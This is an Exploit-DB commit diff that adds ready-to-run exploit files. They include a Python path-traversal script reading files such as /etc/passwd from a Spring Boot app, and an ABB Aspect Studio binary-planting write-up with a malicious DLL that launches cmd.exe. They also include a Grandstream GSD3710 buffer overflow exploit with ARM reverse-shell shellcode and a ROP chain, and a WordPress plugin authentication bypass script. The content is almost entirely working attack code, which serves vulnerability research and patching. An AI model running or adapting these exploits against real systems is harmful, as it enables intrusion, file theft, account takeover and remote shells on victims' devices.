DB: 2025-05-26 (d69eaace) · Commits · Exploit-DB / Exploits + Shellcode + GHDB

exploits/java/webapps/52304.py

0 → 100755

+57 −0

Original line number	Diff line number	Diff line
		# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read
		# Google Dork:
		# Date: 23/May/2025
		# Exploit Author: d3sca
		# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase
		# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase
		# Version: [app version] 1.1
		# Tested on: Debian Linux
		# CVE : CVE-2025-46822

		#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd

		import argparse
		import requests

		from urllib.parse import quote
		def exploit(target, file_path, output=None):
		# Ensure the file path is absolute
		if not file_path.startswith('/'):
		print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.")
		file_path = '/' + file_path.lstrip('/')

		# URL-encode the file path
		encoded_path = quote(file_path, safe='')

		# Construct the target URL
		endpoint = f"/api/v1/files/{encoded_path}"
		url = target.rstrip('/') + endpoint
		print(f"[*] Attempting to retrieve: {file_path}")
		print(f"[*] Sending request to: {url}")
		try:
		response = requests.get(url, allow_redirects=False, timeout=10)

		if response.status_code == 200:
		print("[+] File retrieved successfully!")
		if output:
		with open(output, 'wb') as f:
		f.write(response.content)
		print(f"[+] Content saved to: {output}")
		else:
		print("\nFile contents:")
		print(response.text)
		else:
		print(f"[-] Failed to retrieve file. Status code: {response.status_code}")
		print(f"[-] Response: {response.text[:200]}") # Show first 200 chars of response
		except Exception as e:
		print(f"[-] An error occurred: {str(e)}")

		if name == "main":
		parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API")
		parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)")
		parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)")
		parser.add_argument("-o", "--output", help="Output file to save contents")

		args = parser.parse_args()

		exploit(args.target, args.file_path, args.output)
		No newline at end of file

exploits/multiple/local/52306.txt

0 → 100644

+111 −0

Original line number	Diff line number	Diff line
		# Exploit Title: ABB Cylon Aspect Studio 3.08.03 - Binary Planting
		# Vendor: ABB Ltd.
		# Product web page: https://www.global.abb
		# Affected version: <=3.08.03
		# Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7
		# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience

		# Advisory ID: ZSL-2025-5952
		# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php

		# CVE ID: CVE-2024-13946
		# CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946

		C:\> type project

		P R O J E C T

		.\|
		\| \|
		\|'\| ._____
		___ \| \| \|. \|' .---"\|
		_ .-' '-. \| \| .--'\| \|\| \| _\| \|
		.-'\| _.\| \| \|\| '-__ \| \| \| \|\| \|
		\|' \| \|. \| \|\| \| \| \| \| \|\| \|
		____\| '-' ' "" '-' '-.' '` \|____
		░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
		░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
		░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
		░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
		░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
		░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
		░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
		░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
		░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
		░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
		░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
		░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
		░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
		░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░


		C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll
		C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat
		REM 64bit parameters
		jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar

		C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat

		C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters

		C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar


		C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class
		...
		...
		System.loadLibrary("CylonLicence");
		} catch (Throwable t) {}
		LoggerUtil.logger.error("Error loading license DLL", t);
		}
		}
		...
		...

		C:\Aspect\Aspect-Studio-3.08.03> cd logs
		C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log

		ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main]
		java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path
		at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867)
		at java.lang.Runtime.loadLibrary0(Runtime.java:870)
		at java.lang.System.loadLibrary(System.java:1122)
		at com.aamatrix.util.AspectStudio.<clinit>(AspectStudio.java:42)
		at com.aamatrix.vib.rrobin.CylonLicense.<init>(CylonLicense.java:18)
		at com.aamatrix.vib.rrobin.LicenseService.<init>(LicenseService.java:38)
		at com.aamatrix.vib.rrobin.LicenseService.<clinit>(LicenseService.java:34)
		at com.aamatrix.projectmanager.AspectStudio.<clinit>(AspectStudio.java:52)
		at java.lang.Class.forName0(Native Method)
		at java.lang.Class.forName(Class.java:348)
		at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70)
		...
		...

		C:\DLL-Mala> type CylonLicence.cpp

		#define WIN32_LEAN_AND_MEAN
		#include <windows.h>
		#include <shellapi.h>


		extern "C" __declspec(dllexport)
		DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) {
		ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL);
		return 0;
		}

		extern "C" __declspec(dllexport)
		BOOL APIENTRY DllMain(HMODULE hModule,
		DWORD ul_reason_for_call,
		LPVOID lpReserved) {
		switch (ul_reason_for_call) {
		case DLL_PROCESS_ATTACH:
		CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL);
		break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
		}
		return TRUE;
		}
		No newline at end of file

exploits/multiple/remote/52303.py

0 → 100755

+247 −0

Original line number	Diff line number	Diff line
		#!/usr/bin/env python3

		# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow
		# Google Dork: [if applicable]
		# Date: 2025-05-23
		# Exploit Author: Pepelux (user in ExploitDB)
		# Vendor Homepage: https://www.grandstream.com/
		# Software Link: [download link if available]
		# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
		# Tested on: Linux and MacOS
		# CVE: CVE-2022-2070

		"""
		Author: Jose Luis Verdeguer (@pepeluxx)

		Required: Pwntools

		Example:

		Terminal 1:
		$ ncat -lnvp 4444

		Terminal 2:
		$ python 3 CVE-2020-2070.py -ti DEVICE_IP -tp 8081 -ri LOCAL_IP -rp 4444
		"""

		from operator import ge
		import sys
		import time
		from pwn import *

		import argparse


		def get_args():
		parser = argparse.ArgumentParser(
		formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
		prog, max_help_position=50))

		# Add arguments
		parser.add_argument('-ti', '--target_ip', type=str, required=True,
		help='device IP address', dest="device_ip")
		parser.add_argument('-tp', '--target_port', type=int, required=True, default=8081,
		help='device port', dest="device_port")
		parser.add_argument('-ri', '--reverse_ip', type=str, required=True,
		help='reverse IP address', dest="reverse_ip")
		parser.add_argument('-rp', '--reverse_port', type=int, required=True,
		help='reverse port', dest="reverse_port")

		# Array for all arguments passed to script
		args = parser.parse_args()

		try:
		TI = args.device_ip
		TP = args.device_port
		RI = args.reverse_ip
		RP = args.reverse_port

		return TI, TP, RI, RP
		except ValueError:
		exit()


		def check_badchars(data):
		for i in range(len(data)):
		if data[i] in [0x0, 0x40]:
		log.warn("Badchar %s detected at %#x" % (hex(data[i]), i))
		return True
		return False


		def get_shellcode(ip, port):
		ip_bytes = socket.inet_aton(ip)
		port_bytes = struct.pack(">H", port)

		# Linux ARM reverse shell

		# switch to thumb mode
		sc = b"\x01\x30\x8F\xE2" # add r3, pc, #1
		sc += b"\x13\xFF\x2F\xE1" # bx r3

		# socket(2, 1, 0)
		sc += b"\x02\x20" # movs r0, #2
		sc += b"\x01\x21" # movs r1, #1
		sc += b"\x92\x1A" # subs r2, r2, r2
		sc += b"\xC8\x27" # movs r7, #0xc8
		sc += b"\x51\x37" # adds r7, #0x51
		sc += b"\x01\xDF" # svc #1
		sc += b"\x04\x1C" # adds r4, r0, #0

		# connect(r0, &sockaddr, 16)
		sc += b"\x0C\xA1" # adr r1, #0x30
		sc += b"\x4A\x70" # strb r2, [r1, #1]
		sc += b"\x10\x22" # movs r2, #0x10
		sc += b"\x02\x37" # adds r7, #2
		sc += b"\x01\xDF" # svc #1

		# dup2(sockfd, 0)
		sc += b"\x3F\x27" # movs r7, #0x3f
		sc += b"\x20\x1C" # adds r0, r4, #0
		sc += b"\x49\x1A" # subs r1, r1, r1
		sc += b"\x01\xDF" # svc #1

		# dup2(sockfd, 1)
		sc += b"\x20\x1C" # adds r0, r4, #0
		sc += b"\x01\x21" # movs r1, #1
		sc += b"\x01\xDF" # svc #1

		# dup2(sockfd, 2)
		sc += b"\x20\x1C" # adds r0, r4, #0
		sc += b"\x02\x21" # movs r1, #2
		sc += b"\x01\xDF" # svc #1

		# execve("/bin/sh")
		sc += b"\x06\xA0" # adr r0, #0x18
		sc += b"\x92\x1A" # subs r2, r2, r2
		sc += b"\x49\x1A" # subs r1, r1, r1
		sc += b"\x01\x91" # str r1, [sp, #4]
		sc += b"\x02\x91" # str r1, [sp, #8]
		sc += b"\x01\x90" # str r0, [sp, #4]
		sc += b"\x01\xA9" # add r1, sp, #4
		sc += b"\xC2\x71" # strb r2, [r0, #7]
		sc += b"\x0B\x27" # movs r7, #0xb
		sc += b"\x01\xDF" # svc #1

		sc += b"\x02\xFF"
		sc += port_bytes
		sc += ip_bytes
		sc += b"/bin/shX"

		return sc


		def main():
		ti, tp, ri, rp = get_args()

		# ROP Gadgets

		libc_base = 0x76ec1000

		mprotect = libc_base + 0x93510+1
		pop_lr = libc_base + 0x1848C # pop {r0, r4, r8, ip, lr, pc}
		pop_pc = libc_base + 0xd7515 # pop {pc}
		pop_r0 = libc_base + 0x00064bb0+1 # 0x00064bb0 : pop {r0, pc}

		pop_r5 = libc_base + 0x00003738+1 # 0x00003738 : pop {r5, pc}
		add_r1_sp = libc_base + 0x000b3c4e+1 # 0x000b3c4e : add r1, sp, #0x14 ; blx r5
		# 0x0002f83c (0x0002f83d): mov r0, r1; bx lr
		mov_r0_r1 = libc_base + 0x0002f83d
		# 0x0006a086 (0x0006a087): pop {r1, pc}
		pop_r1 = libc_base + 0x6a087
		ands_r0_r1 = libc_base + 0x1feba+1 # 0x0001feba : ands r0, r1 ; bx lr
		# 0x000a3a42 : movs r4, r0 ; pop {r1, pc}
		mov_r4_r0 = libc_base + 0x000a3a42+1
		# 0x0001fdae (0x0001fdaf): movs r1, r0; bx lr
		movs_r1_r0 = libc_base + 0x0001fdaf

		and_r0_f = libc_base + 0x8717e+1 # 0x0008717e : and r0, r0, #0xf ; bx lr
		movs_r2_r0 = libc_base + 0x0001fc6a+1 # 0x0001fc6a : movs r2, r0 ; bx lr
		mov_r0_r4 = libc_base + 0x0001f9d4+1 # 0x0001f9d4 : movs r0, r4 ; bx lr
		blx_sp = libc_base + 0x46595 # 0x00046594 (0x00046595): blx sp

		shellcode = get_shellcode(ri, rp)

		auth_command = b"LOG/1.0 END CMD:AUTH_USERNAME @"
		junk = p32(0x43434343)

		payload = auth_command
		payload += b"A" * 144

		# The goal is that R0 -> SP

		# R5 = pop {pc}
		# because in the the next gadget we have a blx r5
		payload += p32(pop_r5)
		payload += p32(pop_pc) # R5 = pop {pc}

		# R1 = SP ; BLX pop {pc}
		payload += p32(add_r1_sp) # add r1, sp, #0x14 ; blx r5

		# Restore LR register (because it has been updated by the last BLX gadget)
		payload += p32(pop_lr) # pop {r0, r4, r8, ip, lr, pc}
		payload += junk*4 # r0, r4, r8, ip
		payload += p32(pop_pc) # LR = pop {pc}

		# R0 = stack address
		payload += p32(mov_r0_r1) # mov r0, r1; bx lr

		# R1 = mask page align
		payload += p32(pop_r1) # pop {r1, pc}
		payload += p32(0xfffe1001)

		# R0 = stack address & 0xfffe1001
		payload += p32(ands_r0_r1) # ands r0, r1 ; bx lr
		# R4 = R0
		payload += p32(mov_r4_r0) # movs r0, r4 ; bx lr
		payload += junk # r1

		# mprotect params
		# r0 = shellcode page aligned address
		# r1 = size(ofshellcode)
		# r2 = protection (0x7 – RWX)

		# R2 = 0x7
		payload += p32(pop_r0)
		payload += p32(0x07070707)
		payload += p32(and_r0_f) # R0 = 7 (RWX)
		payload += p32(movs_r2_r0) # R2 (prot: 7 - RWX)

		# R1 = length = 0x10101010 (avoid 0's)
		payload += p32(pop_r0)
		payload += p32(0x01010101)
		payload += p32(movs_r1_r0) # r1 (length: 0x10101010)

		# R0 = stack address 4k aligned
		payload += p32(mov_r0_r4)

		# mprotect(stack, 0x10101010, 0x7)
		payload += p32(mprotect)
		payload += p32(blx_sp) # ejecutamos en pila
		payload += shellcode # shellcode

		if check_badchars(payload[len(auth_command):]):
		sys.exit(0)

		log.info("Device IP: %s:%d" % (ti, tp))
		log.info("Attacker IP: %s:%d" % (ri, rp))
		log.info("Payload len: %d" % len(payload))

		count = 1

		while True:
		try:
		print('Try: %d' % count)
		r = remote(ti, tp)
		r.send(payload)
		log.success("Payload sent!")
		# r.close()
		time.sleep(1)
		count += 1
		except:
		sleep(3)
		pass


		if __name__ == '__main__':
		main()
		No newline at end of file

exploits/multiple/remote/52305.py

0 → 100755

+281 −0

File added.

Preview size limit exceeded, changes collapsed.

exploits/multiple/webapps/52302.py

0 → 100755

+65 −0

Original line number	Diff line number	Diff line
		#!/usr/bin/env python3
		# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass
		# Date: 2025-05-22
		# Exploit Author: Mohammed Idrees Banyamer
		# Vendor Homepage: https://wordpress.org/plugins/user-registration/
		# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip
		# Version: <= 4.1.2
		# Tested on: WordPress 6.x, Apache on Linux
		# CVE: CVE-2025-2594

		import requests
		import sys
		import argparse
		from urllib.parse import urljoin
		from termcolor import cprint, colored

		def banner():
		cprint("┌──────────────────────────────────────────────┐", "cyan")
		cprint("│ WordPress Plugin User Registration <= 4.1.2 │", "cyan")
		cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan")
		cprint("│ Author: Mohammed Idrees Banyamer │", "cyan")
		cprint("└──────────────────────────────────────────────┘", "cyan")

		def exploit(target_url, member_id, nonce):
		endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")

		files = {
		'action': (None, 'user_registration_membership_confirm_payment'),
		'security': (None, nonce),
		'form_response': (None, '{"auto_login": true}'),
		'member_id': (None, str(member_id))
		}

		cprint(f"[+] Target URL: {endpoint}", "yellow")
		cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow")

		try:
		response = requests.post(endpoint, files=files, timeout=10)

		if response.status_code == 200 and '"success":true' in response.text:
		cprint("[✓] Exploit successful! Authentication bypass achieved.", "green")
		cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green")
		print("Server Response:")
		print(response.text)
		else:
		cprint("[-] Exploit failed or invalid nonce/member_id.", "red")
		print("Server Response:")
		print(response.text)
		except requests.exceptions.RequestException as e:
		cprint(f"[!] Request failed: {e}", "red")

		def main():
		banner()

		parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass")
		parser.add_argument("target", help="Base target URL (e.g., http://localhost)")
		parser.add_argument("member_id", help="Target user ID (usually 1 for admin)")
		parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page")

		args = parser.parse_args()

		exploit(args.target, args.member_id, args.nonce)

		if __name__ == "__main__":
		main()
		No newline at end of file